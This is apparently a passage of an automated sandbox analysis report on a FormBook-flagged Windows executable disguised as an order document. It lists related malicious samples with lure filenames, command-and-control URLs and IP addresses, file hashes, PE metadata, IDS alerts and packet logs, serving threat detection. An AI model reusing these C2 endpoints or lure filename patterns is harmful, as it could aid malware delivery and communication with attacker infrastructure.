                                                                      • www.oldschoolnews.net/uabu/?ojqD-Z=KdrhxNh8&9r4Hc=ruxw5m/fBZTANxn0+vJzkbJheatIWyH69nVPD3/Jlr0HuUfdGUrtHvekpNeCw/DRWxiy
                                                                      pdf Re revised PI 900tons.exeGet hashmaliciousBrowse
                                                                      • www.barebeautybrand.com/edbs/?mHId9X=Ekboab0eq8QaRRJsr09zs/Usmrg5EP+fQbkocCp54h0GPmynCi9xyIzJucRcL6VdOaJj4w++gA==&ExlldL=Udg8Tf2pOFu
                                                                      Ac5RA9R99F.exeGet hashmaliciousBrowse
                                                                      • www.alum2alum.network/evpn/?CZa4=kozDiZlecnkXSK85284p8pD4k2/h1KafOhFtAjgttK/6zeVOB185UpWNMWH27xqr42kf&CPWhW=C8eHk
                                                                      OrSxEMsYDA.exeGet hashmaliciousBrowse
                                                                      • www.moev.city/svh9/?s4Jxc=06m0IvzpaBhL8Lup&1bw=aJQR8+ngIk9GDIj7vnfNuHFQ6pDOInKj0o660hH8PI/DLizbc1YcQUY1VNOO6dLZdAltgKBIKQ==
                                                                      Ref. PDF IGAPO17493.exeGet hashmaliciousBrowse
                                                                      • www.barebeautybrand.com/edbs/?BbW=Ekboab0eq8QaRRJsr09zs/Usmrg5EP+fQbkocCp54h0GPmynCi9xyIzJucdcYqZeXKJ1&blX=yVCTVP0X
                                                                      Quotation.exeGet hashmaliciousBrowse
                                                                      • www.clickqrcoaster.com/fcn/?ndsxlrp=4nVmM3kokLOk5A5KPpUlNAhIJJn3COZ2tebCUHwKvxD3r3Ccio9dbVOfTPTbeaZZl4cM&wZALH=PToxs4gHMXctdDo
                                                                      DYANAMIC Inquiry.xlsxGet hashmaliciousBrowse
                                                                      • www.boogerstv.com/p2io/?pJE8=G0GpifmhvxtXlZL&-ZoXL=fW2NkW2m2880y7g2f/m+egXTc5dWq8qtohIQX9xRv3Snfsyr1ZmLXRti4FdN58+iKIl8Sw==
                                                                      ALPHA SCIENCE, INC.exeGet hashmaliciousBrowse
                                                                      • www.911salesrescue.com/sqra/?Rl=pq8KHaLgBYlMb7GR3VJ/cL4dF9VTs2jS1VGjWDfBvu/RR65b3/eoUhDFCE5vmyzJV1nh&_jqT2L=gBg8BF3ptlc
                                                                      1517679127365.exeGet hashmaliciousBrowse
                                                                      • www.swavhca.com/ct6a/?YP=fbdhu8lXTJZTH&LhN0T=t85XbN3qNlbTw/JaLNJ7F4/+On2opPlRNjQpYLfn5nRJIrt0zCXnGg8yVYHQwlCaZVdo
                                                                      TSPO0001978-xlxs.exeGet hashmaliciousBrowse
                                                                      • www.switcheo.finance/uwec/?-ZVd=1bgta&T8VxaVs=3cOH6CffnF8zA2vO0DHvKlrvSwO+w2vUbH/s+qgAJjYXXQ/ohIL0shsdTQ14Zv3dTuQV
                                                                      igPVY6UByI.exeGet hashmaliciousBrowse
                                                                      • www.dbdcontractlngllc.com/evpn/?6lB4ir3X=HFShCSWXwaKkW2ZiFlcUlPO3+HJMVrrKG3pif6jrFe/K9RUAGcpqC/YV0bjZ8afR2I7A&lZQ=fxoxjP38
                                                                      order samples 056-062 _pdf.exeGet hashmaliciousBrowse
                                                                      • www.gattisicecream.com/nu8e/?7ntLT=H0OBJMmEUgvZcgBddvaavx+e86Q1Ewqz/q4u2TIdbw6nMChu3R+Cq7j/in+DO7Gj50PD&v4Xpf=oBZl2rip
                                                                      P.O71540.xlsxGet hashmaliciousBrowse
                                                                      • www.toplevelsealcoating.net/njo/?jpal0=mxuHlFV+ZuSguIs2Jcwsp6DcsuxeedOYcK/5rsXgvOQsfT3joYJg2D4C6z0Ci+7Qc2CgOg==&3ft=fxotnVnH_pxPJD2P
                                                                      Purchase Order _pdf.exeGet hashmaliciousBrowse
                                                                      • www.doorman.pro/bft/?s8eTn6p=cPB7zr1p3SmwgzYXiBUkF9mwqufO0UDDdPUnBBhQn+hhkWASV2AK1gVN757rEFaij0Eh&2d=lnxh
                                                                      PO#4503527426.xlsxGet hashmaliciousBrowse
                                                                      • www.oodi.club/j5an/?3f=dOaW3vahSXqg4+CHM7A8brpc4JT3ik1DQ14U6alOEgrJbBQuvLIVfIvFsL19wjAmshOCtA==&SH=u2M0w8Cp
                                                                      SOA 2.docGet hashmaliciousBrowse
                                                                      • www.inifinityapps.net/bf3/?pBR=swuzFfg2YELF3Ru0riS9eAlbkrlhpvPYJEoO3kAfMfwngIUjKqHF470zbQhO/y10VYkWvA==&ON6h=lFQLUjPpddS8R0S0

                                                                      Domains

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                      parkingpage.namecheap.com00098765123POIIU.exeGet hashmaliciousBrowse
                                                                      • 198.54.117.217
                                                                      Inquiry_10_05_2021,pdf.exeGet hashmaliciousBrowse
                                                                      • 198.54.117.215
                                                                      Citvonvhciktufwvyzyhistnewdjgsoqdr.exeGet hashmaliciousBrowse
                                                                      • 198.54.117.212
                                                                      NAVTECO_R1_10_05_2021,pdf.exeGet hashmaliciousBrowse
                                                                      • 198.54.117.212
                                                                      POI09876OIUY.exeGet hashmaliciousBrowse
                                                                      • 198.54.117.210
                                                                      EDS03932,pdf.exeGet hashmaliciousBrowse
                                                                      • 198.54.117.216
                                                                      Purchase Order.exeGet hashmaliciousBrowse
                                                                      • 198.54.117.216
                                                                      slot Charges.exeGet hashmaliciousBrowse
                                                                      • 198.54.117.216
                                                                      PO09641.exeGet hashmaliciousBrowse
                                                                      • 198.54.117.215
                                                                      BORMAR SA_Cotizaci#U00f3n de producto doc.exeGet hashmaliciousBrowse
                                                                      • 198.54.117.211
                                                                      Purchase Order-10764.exeGet hashmaliciousBrowse
                                                                      • 198.54.117.212
                                                                      4LkSpeVqKR.exeGet hashmaliciousBrowse
                                                                      • 198.54.117.218
                                                                      2B0CsHzr8o.exeGet hashmaliciousBrowse
                                                                      • 198.54.117.216
                                                                      60b88477_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                      • 198.54.117.215
                                                                      DHL Receipt_AWB811470484778.exeGet hashmaliciousBrowse
                                                                      • 198.54.117.217
                                                                      NEW ORDER.exeGet hashmaliciousBrowse
                                                                      • 198.54.117.217
                                                                      0876543123.exeGet hashmaliciousBrowse
                                                                      • 198.54.117.210
                                                                      g1EhgmCqCD.exeGet hashmaliciousBrowse
                                                                      • 198.54.117.216
                                                                      Payment.xlsxGet hashmaliciousBrowse
                                                                      • 198.54.117.210
                                                                      w73FtMA4ZTl9NFm.exeGet hashmaliciousBrowse
                                                                      • 198.54.117.212
                                                                      www.goodcreditcardshome.infoPO9448882.exeGet hashmaliciousBrowse
                                                                      • 18.219.49.238

                                                                      ASN

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                      AMAZON-02USmain_setup_x86x64.exeGet hashmaliciousBrowse
                                                                      • 104.192.141.1
                                                                      A6FAm1ae1j.exeGet hashmaliciousBrowse
                                                                      • 3.138.180.119
                                                                      New_Order.exeGet hashmaliciousBrowse
                                                                      • 75.2.115.196
                                                                      NAVTECO_R1_10_05_2021,pdf.exeGet hashmaliciousBrowse
                                                                      • 13.58.50.133
                                                                      YDHhjjAEFbel88t.exeGet hashmaliciousBrowse
                                                                      • 99.83.175.80
                                                                      yU7RItYEQ9kCkZE.exeGet hashmaliciousBrowse
                                                                      • 99.83.175.80
                                                                      Shipment Document BL,INV and packing List.exeGet hashmaliciousBrowse
                                                                      • 52.58.78.16
                                                                      4xPBZai06p.dllGet hashmaliciousBrowse
                                                                      • 13.225.75.73
                                                                      0OyVQNXrTo.exeGet hashmaliciousBrowse
                                                                      • 3.142.167.54
                                                                      rAd00Nae9w.dllGet hashmaliciousBrowse
                                                                      • 13.225.75.73
                                                                      DOC24457188209927.exeGet hashmaliciousBrowse
                                                                      • 13.224.193.2
                                                                      user-invoice-8488888.docGet hashmaliciousBrowse
                                                                      • 104.192.141.1
                                                                      user-invoice-8488888.docGet hashmaliciousBrowse
                                                                      • 104.192.141.1
                                                                      ProForma Invoice 20210510.exeGet hashmaliciousBrowse
                                                                      • 13.113.228.117
                                                                      PO9448882.exeGet hashmaliciousBrowse
                                                                      • 18.219.49.238
                                                                      jjbxg8kh5X.exeGet hashmaliciousBrowse
                                                                      • 52.216.177.83
                                                                      4si5VtPNTe.exeGet hashmaliciousBrowse
                                                                      • 3.6.208.121
                                                                      latvia-order-051121_.docGet hashmaliciousBrowse
                                                                      • 52.219.129.63
                                                                      BANK-ACCOUNT. NUMBER.PDF.exeGet hashmaliciousBrowse
                                                                      • 3.16.197.4
                                                                      PRF00202156KMT.exeGet hashmaliciousBrowse
                                                                      • 3.16.197.4
                                                                      UNIFIEDLAYER-AS-1UScatalog-1908475637.xlsGet hashmaliciousBrowse
                                                                      • 108.167.180.164
                                                                      catalog-1908475637.xlsGet hashmaliciousBrowse
                                                                      • 108.167.180.164
                                                                      export of purchase order 7484876.xlsmGet hashmaliciousBrowse
                                                                      • 108.179.232.90
                                                                      XM7eDjwHqp.xlsmGet hashmaliciousBrowse
                                                                      • 162.241.190.216
                                                                      QTFsui5pLN.xlsmGet hashmaliciousBrowse
                                                                      • 108.179.232.90
                                                                      15j1TCnOiA.xlsmGet hashmaliciousBrowse
                                                                      • 192.185.115.105
                                                                      e8eRhf3GM0.xlsmGet hashmaliciousBrowse
                                                                      • 162.241.190.216
                                                                      SOA PDF.exeGet hashmaliciousBrowse
                                                                      • 192.185.226.148
                                                                      djBLaxEojp.exeGet hashmaliciousBrowse
                                                                      • 192.185.161.67
                                                                      quotation 35420PDF.exeGet hashmaliciousBrowse
                                                                      • 192.185.41.225
                                                                      REQUEST FOR PRICE QUOTE - URGENT.pdf.exeGet hashmaliciousBrowse
                                                                      • 162.241.24.59
                                                                      551f47ac_by_Libranalysis.xlsmGet hashmaliciousBrowse
                                                                      • 192.185.138.180
                                                                      invoice and packing list.pdf.exeGet hashmaliciousBrowse
                                                                      • 192.185.136.173
                                                                      PO82055.exeGet hashmaliciousBrowse
                                                                      • 192.185.161.67
                                                                      export of document 555091.xlsmGet hashmaliciousBrowse
                                                                      • 192.185.173.71
                                                                      file.exeGet hashmaliciousBrowse
                                                                      • 192.185.190.186
                                                                      generated purchase order 6149057.xlsmGet hashmaliciousBrowse
                                                                      • 162.241.55.9
                                                                      file.exeGet hashmaliciousBrowse
                                                                      • 192.185.186.178
                                                                      fax 4044.xlsmGet hashmaliciousBrowse
                                                                      • 192.185.173.71
                                                                      scan of document 5336227.xlsmGet hashmaliciousBrowse
                                                                      • 162.241.55.9
                                                                      EGIHOSTINGUS00098765123POIIU.exeGet hashmaliciousBrowse
                                                                      • 45.39.20.158
                                                                      INv02938727.exeGet hashmaliciousBrowse
                                                                      • 107.165.40.251
                                                                      POI09876OIUY.exeGet hashmaliciousBrowse
                                                                      • 45.39.20.158
                                                                      invscan052021.exeGet hashmaliciousBrowse
                                                                      • 104.252.43.114
                                                                      PURCHASE ORDER 5112101.xlsxGet hashmaliciousBrowse
                                                                      • 172.252.102.196
                                                                      Purchase Order.exeGet hashmaliciousBrowse
                                                                      • 45.38.16.182
                                                                      WAkePI6vWufG5Bb.exeGet hashmaliciousBrowse
                                                                      • 142.111.54.187
                                                                      new order.xlsxGet hashmaliciousBrowse
                                                                      • 104.252.75.149
                                                                      Il nuovo ordine e nell'elenco allegato.exeGet hashmaliciousBrowse
                                                                      • 166.88.252.48
                                                                      987654OIUYFG.exeGet hashmaliciousBrowse
                                                                      • 104.164.224.84
                                                                      2B0CsHzr8o.exeGet hashmaliciousBrowse
                                                                      • 107.186.80.147
                                                                      REVISED ORDER.exeGet hashmaliciousBrowse
                                                                      • 107.187.161.189
                                                                      NEW ORDER.exeGet hashmaliciousBrowse
                                                                      • 45.38.16.182
                                                                      new order.exeGet hashmaliciousBrowse
                                                                      • 45.39.88.129
                                                                      TT.exeGet hashmaliciousBrowse
                                                                      • 107.165.149.13
                                                                      a3aa510e_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                      • 104.252.43.114
                                                                      Airwaybill # 6913321715.exeGet hashmaliciousBrowse
                                                                      • 107.165.10.98
                                                                      PURCHASE ORDER.exeGet hashmaliciousBrowse
                                                                      • 45.38.16.182
                                                                      DocNo2300058329.doc__.rtfGet hashmaliciousBrowse
                                                                      • 104.252.43.114
                                                                      Bill Of Lading & Packing List.pdf.gz.exeGet hashmaliciousBrowse
                                                                      • 104.252.53.97

                                                                      JA3 Fingerprints

                                                                      No context

                                                                      Dropped Files

                                                                      No context

                                                                      Created / dropped Files

                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Order 122001-220 guanzo.exe.log
                                                                      Process:C:\Users\user\Desktop\Order 122001-220 guanzo.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):1314
                                                                      Entropy (8bit):5.350128552078965
                                                                      Encrypted:false
                                                                      SSDEEP:24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
                                                                      MD5:1DC1A2DCC9EFAA84EABF4F6D6066565B
                                                                      SHA1:B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
                                                                      SHA-256:28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
                                                                      SHA-512:95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
                                                                      Malicious:true
                                                                      Reputation:high, very likely benign file
                                                                      Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                                                      Static File Info

                                                                      General

                                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                      Entropy (8bit):7.562702233782242
                                                                      TrID:
                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                      • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                      • Windows Screen Saver (13104/52) 0.07%
                                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                                      File name:Order 122001-220 guanzo.exe
                                                                      File size:736768
                                                                      MD5:9e819bcc826e7a20b0fd139cc4185195
                                                                      SHA1:bdb33c04403e308dcc79ced36201c577a40f0311
                                                                      SHA256:5b09da58ac487c25237bf1a8ba98988af849980d5fe92dd1ca417591b977d7a8
                                                                      SHA512:50af233a3a46a900fedc6b7dd946b69c8f19fef313b32836e84bf5150c6c4c91c9fbe109e1b62250010229a7a3caa33f20c6b65df95e53bc0692cba7b1b47899
                                                                      SSDEEP:12288:m/gn4mlGBkPyasxS/02yp+bqdGvCAPY4EEfySWfzC6v+qsMwWKWO:m4GeadxSB87GvLg6Ibv+ZXV
                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....[.`.................*...........I... ...`....@.. ....................................@................................

                                                                      File Icon

                                                                      Icon Hash:583cfc1c7062f870

                                                                      Static PE Info

                                                                      General

                                                                      Entrypoint:0x4a49ce
                                                                      Entrypoint Section:.text
                                                                      Digitally signed:false
                                                                      Imagebase:0x400000
                                                                      Subsystem:windows gui
                                                                      Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                                                                      DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                      Time Stamp:0x60985B9D [Sun May 9 22:01:01 2021 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:v4.0.30319
                                                                      OS Version Major:4
                                                                      OS Version Minor:0
                                                                      File Version Major:4
                                                                      File Version Minor:0
                                                                      Subsystem Version Major:4
                                                                      Subsystem Version Minor:0
                                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                      Entrypoint Preview

                                                                      Instruction
                                                                      jmp dword ptr [00402000h]
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al

                                                                      Data Directories

                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xa49740x57.text
                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xa80000x10e58.rsrc
                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0xa60000xc.reloc
                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                      Sections

                                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                      .text0x20000xa29d40xa2a00False0.848016549769data7.76742936293IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                      .reloc0xa60000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                      .rsrc0xa80000x10e580x11000False0.243049172794data4.11172065775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                      Resources

                                                                      NameRVASizeTypeLanguageCountry
                                                                      RT_ICON0xa81300x10828dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0
                                                                      RT_GROUP_ICON0xb89580x14data
                                                                      RT_VERSION0xb896c0x338data
                                                                      RT_MANIFEST0xb8ca40x1b4XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators

                                                                      Imports

                                                                      DLLImport
                                                                      mscoree.dll_CorExeMain

                                                                      Version Infos

                                                                      DescriptionData
                                                                      Translation0x0000 0x04b0
                                                                      LegalCopyrightCopyright MCS 2018
                                                                      Assembly Version1.0.0.0
                                                                      InternalNameDispIdAttribute.exe
                                                                      FileVersion1.0.0.0
                                                                      CompanyNameMCS
                                                                      LegalTrademarks
                                                                      Comments
                                                                      ProductNameLibrary
                                                                      ProductVersion1.0.0.0
                                                                      FileDescriptionLibrary
                                                                      OriginalFilenameDispIdAttribute.exe

                                                                      Network Behavior

                                                                      Snort IDS Alerts

                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                      05/12/21-10:51:18.705997TCP2031453ET TROJAN FormBook CnC Checkin (GET)4972180192.168.2.434.102.136.180
                                                                      05/12/21-10:51:18.705997TCP2031449ET TROJAN FormBook CnC Checkin (GET)4972180192.168.2.434.102.136.180
                                                                      05/12/21-10:51:18.705997TCP2031412ET TROJAN FormBook CnC Checkin (GET)4972180192.168.2.434.102.136.180
                                                                      05/12/21-10:51:18.844483TCP1201ATTACK-RESPONSES 403 Forbidden804972134.102.136.180192.168.2.4
                                                                      05/12/21-10:51:29.565347TCP1201ATTACK-RESPONSES 403 Forbidden804972334.102.136.180192.168.2.4
                                                                      05/12/21-10:51:34.680214TCP2031453ET TROJAN FormBook CnC Checkin (GET)4972480192.168.2.434.102.136.180
                                                                      05/12/21-10:51:34.680214TCP2031449ET TROJAN FormBook CnC Checkin (GET)4972480192.168.2.434.102.136.180
                                                                      05/12/21-10:51:34.680214TCP2031412ET TROJAN FormBook CnC Checkin (GET)4972480192.168.2.434.102.136.180
                                                                      05/12/21-10:51:34.817345TCP1201ATTACK-RESPONSES 403 Forbidden804972434.102.136.180192.168.2.4
                                                                      05/12/21-10:51:47.347272TCP2031453ET TROJAN FormBook CnC Checkin (GET)4972680192.168.2.4104.164.26.246
                                                                      05/12/21-10:51:47.347272TCP2031449ET TROJAN FormBook CnC Checkin (GET)4972680192.168.2.4104.164.26.246
                                                                      05/12/21-10:51:47.347272TCP2031412ET TROJAN FormBook CnC Checkin (GET)4972680192.168.2.4104.164.26.246
                                                                      05/12/21-10:52:09.098131TCP2031453ET TROJAN FormBook CnC Checkin (GET)4972880192.168.2.418.219.49.238
                                                                      05/12/21-10:52:09.098131TCP2031449ET TROJAN FormBook CnC Checkin (GET)4972880192.168.2.418.219.49.238
                                                                      05/12/21-10:52:09.098131TCP2031412ET TROJAN FormBook CnC Checkin (GET)4972880192.168.2.418.219.49.238
                                                                      05/12/21-10:52:14.662301TCP2031453ET TROJAN FormBook CnC Checkin (GET)4972980192.168.2.4162.241.62.63
                                                                      05/12/21-10:52:14.662301TCP2031449ET TROJAN FormBook CnC Checkin (GET)4972980192.168.2.4162.241.62.63
                                                                      05/12/21-10:52:14.662301TCP2031412ET TROJAN FormBook CnC Checkin (GET)4972980192.168.2.4162.241.62.63
                                                                      05/12/21-10:52:20.083382TCP1201ATTACK-RESPONSES 403 Forbidden804973034.102.136.180192.168.2.4

                                                                      Network Port Distribution

                                                                      TCP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      May 12, 2021 10:51:18.664244890 CEST4972180192.168.2.434.102.136.180
                                                                      May 12, 2021 10:51:18.705457926 CEST804972134.102.136.180192.168.2.4
                                                                      May 12, 2021 10:51:18.705667019 CEST4972180192.168.2.434.102.136.180
                                                                      May 12, 2021 10:51:18.705996990 CEST4972180192.168.2.434.102.136.180
                                                                      May 12, 2021 10:51:18.748567104 CEST804972134.102.136.180192.168.2.4
                                                                      May 12, 2021 10:51:18.844482899 CEST804972134.102.136.180192.168.2.4
                                                                      May 12, 2021 10:51:18.844995975 CEST4972180192.168.2.434.102.136.180
                                                                      May 12, 2021 10:51:18.845154047 CEST804972134.102.136.180192.168.2.4
                                                                      May 12, 2021 10:51:18.845277071 CEST4972180192.168.2.434.102.136.180
                                                                      May 12, 2021 10:51:18.886292934 CEST804972134.102.136.180192.168.2.4
                                                                      May 12, 2021 10:51:24.035094023 CEST4972280192.168.2.466.96.162.130
                                                                      May 12, 2021 10:51:24.162120104 CEST804972266.96.162.130192.168.2.4
                                                                      May 12, 2021 10:51:24.162272930 CEST4972280192.168.2.466.96.162.130
                                                                      May 12, 2021 10:51:24.162463903 CEST4972280192.168.2.466.96.162.130
                                                                      May 12, 2021 10:51:24.290806055 CEST804972266.96.162.130192.168.2.4
                                                                      May 12, 2021 10:51:24.313256979 CEST804972266.96.162.130192.168.2.4
                                                                      May 12, 2021 10:51:24.313348055 CEST804972266.96.162.130192.168.2.4
                                                                      May 12, 2021 10:51:24.313710928 CEST4972280192.168.2.466.96.162.130
                                                                      May 12, 2021 10:51:24.313878059 CEST4972280192.168.2.466.96.162.130
                                                                      May 12, 2021 10:51:24.441024065 CEST804972266.96.162.130192.168.2.4
                                                                      May 12, 2021 10:51:29.385797977 CEST4972380192.168.2.434.102.136.180
                                                                      May 12, 2021 10:51:29.426841021 CEST804972334.102.136.180192.168.2.4
                                                                      May 12, 2021 10:51:29.426979065 CEST4972380192.168.2.434.102.136.180
                                                                      May 12, 2021 10:51:29.427136898 CEST4972380192.168.2.434.102.136.180
                                                                      May 12, 2021 10:51:29.469638109 CEST804972334.102.136.180192.168.2.4
                                                                      May 12, 2021 10:51:29.565346956 CEST804972334.102.136.180192.168.2.4
                                                                      May 12, 2021 10:51:29.565373898 CEST804972334.102.136.180192.168.2.4
                                                                      May 12, 2021 10:51:29.565687895 CEST4972380192.168.2.434.102.136.180
                                                                      May 12, 2021 10:51:29.565812111 CEST4972380192.168.2.434.102.136.180
                                                                      May 12, 2021 10:51:29.606769085 CEST804972334.102.136.180192.168.2.4
                                                                      May 12, 2021 10:51:34.638822079 CEST4972480192.168.2.434.102.136.180
                                                                      May 12, 2021 10:51:34.679857016 CEST804972434.102.136.180192.168.2.4
                                                                      May 12, 2021 10:51:34.679977894 CEST4972480192.168.2.434.102.136.180
                                                                      May 12, 2021 10:51:34.680213928 CEST4972480192.168.2.434.102.136.180
                                                                      May 12, 2021 10:51:34.724829912 CEST804972434.102.136.180192.168.2.4
                                                                      May 12, 2021 10:51:34.817344904 CEST804972434.102.136.180192.168.2.4
                                                                      May 12, 2021 10:51:34.817398071 CEST804972434.102.136.180192.168.2.4
                                                                      May 12, 2021 10:51:34.817590952 CEST4972480192.168.2.434.102.136.180
                                                                      May 12, 2021 10:51:34.817627907 CEST4972480192.168.2.434.102.136.180
                                                                      May 12, 2021 10:51:34.861659050 CEST804972434.102.136.180192.168.2.4
                                                                      May 12, 2021 10:51:40.080795050 CEST4972580192.168.2.4107.164.93.172
                                                                      May 12, 2021 10:51:40.272236109 CEST8049725107.164.93.172192.168.2.4
                                                                      May 12, 2021 10:51:40.272469044 CEST4972580192.168.2.4107.164.93.172
